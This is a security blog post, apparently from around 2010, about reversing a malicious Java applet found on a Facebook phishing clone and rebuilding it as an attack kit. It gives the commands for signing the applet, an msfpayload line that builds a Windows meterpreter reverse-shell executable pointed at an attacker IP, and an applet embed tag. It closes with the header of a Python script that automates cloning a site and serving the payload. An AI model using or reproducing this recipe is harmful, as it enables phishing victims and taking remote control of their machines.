About a year ago I stumbled upon a Facebook clone phishing site which contained an evil Java applet,
At the time SET wasn’t introduced yet and only few articles disscussing this attack vector were published (Another applet creation process was published by Jabra and described later on the Offensive Security “Metasploit Unleashed” Online course).

No source code was released at the time (At least not that I found).

I was curious about this applet and decided to investigate it…

This post describes the “Reversing” of the applet, which includes decompiling to source code, tweaking the code, recompiling, signing and automating the applet creation process using python.

When entering the site a Java security warning pops up asking if i would like to run an applet:

I was able to download the applet files by using its name and adding the .jar and .class extensions

http://www.fakebook.com/Facebook.class

http://www.fakebook.com/Facebook.jar

Extracted the jar file:

root@Blackbox:~/Java/facebook# unzip Facebook.jar
Archive:  Facebook.jar
inflating: META-INF/MANIFEST.MF
inflating: META-INF/FACEBOOK.SF
inflating: META-INF/FACEBOOK.DSA
inflating: desktop.ini
inflating: Facebook.class
inflating: home.JPG
inflating: index.htm
inflating: index.html
inflating: Update.class
inflating: ~$test.htm

Decompiled the class files using a free Java decompiler named JD-GUI

I reviewed the source code and notice it all come down to 2 main files (which been decompiled to Java source):

“Update.class” and “Facebook.class”

I played around with the source and tweaked it a bit,  After I made the changes it was time to recreate the class and jar files and sign them.

Compiling and Signing the Java applet manually:

Creating and exporting the certificate for signing the applet

root@Blackbox:~/Java/facebook#keytool -genkey -keyalg rsa -alias Facebook
root@Blackbox:~/Java/facebook#keytool -export -alias Facebook -file Facebook.crt

Compiling the facebook.java will result in two additional files: facebook.class and update.class

root@Blackbox:~/Java/facebook#javac Facebook.java

Adding both class files into a JAR file

root@Blackbox:~/Java/facebook#jar cvf Facebook.jar Facebook.class Update.class

Signing the JAR file

root@Blackbox:~/Java/facebook#jarsigner Facebook.jar Facebook

Creating a meterpreter executable using metasploit

root@Blackbox:~/Java/facebook#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 X > payload.exe

Compressing the to a zip file as required by the java source code

root@Blackbox:~/Java/facebook#zip -r payload.zip payload.exe

Created a simple html file and added the code to display the applet:

<applet code="Facebook.class" archive="Facebook.jar" width="1" height="1"></applet>

Copied the the index.html, Facebook.class, Facebook.jar, payload.zip to my web server root folder

The result was good and reliable but every time I want to create a new applet I needed to start this process all over again which is a real pain…

Well, we have SET which does an amazing job in creating those JAVA applets on the fly,cloning web sites and much much more…

but, I couldn’t control the signing process, SET signs the applet as Microsoft as shown in the image below:

I decided to polish my python skills and write a script to automate the applet creation process

Although my script is not versatile nor elegant as SET applet creation process  (which also enable creation and execution of Linux payloads) it gets the job done quite nicely for windows based systems.

I used the java code i found in the wild, added website cloning feature based on SET wget syntax

This is the first version of the script, No error handling or input validation,  Features are very limited and basic in this version,  Maybe i’ll update it in the future and maybe not

Hope you find it useful or you can learn something from it, I know i did

Java Applet Infection using python from NightRanger on Vimeo.

#!/usr/bin/python

'''
Created on Jul 4, 2010
@Author: NightRanger, http://exploit.co.il

This script designed and tested on BackTrack 4 final with metasploit v3.4.1-dev

Requirements: JAVA JDK

Install using: "apt-get install sun-java6-jdk"

Script features:
----------------

- Generates java applet code on the fly
- Generates Keystore / Keystore Removal
- Compiles applet code
- Package and sings JAR file
- Web site cloning
- Generates applet html code
- Creates a meterpreter executable payload
- Starts apache web server
- Starts MSFConsole listener

* Java applet source code found in the wild, decompiled and tweaked.
* Website clone wget syntax taken from SET.

Change log:

* Jul 5, 2010 - Keystore removal confirmation added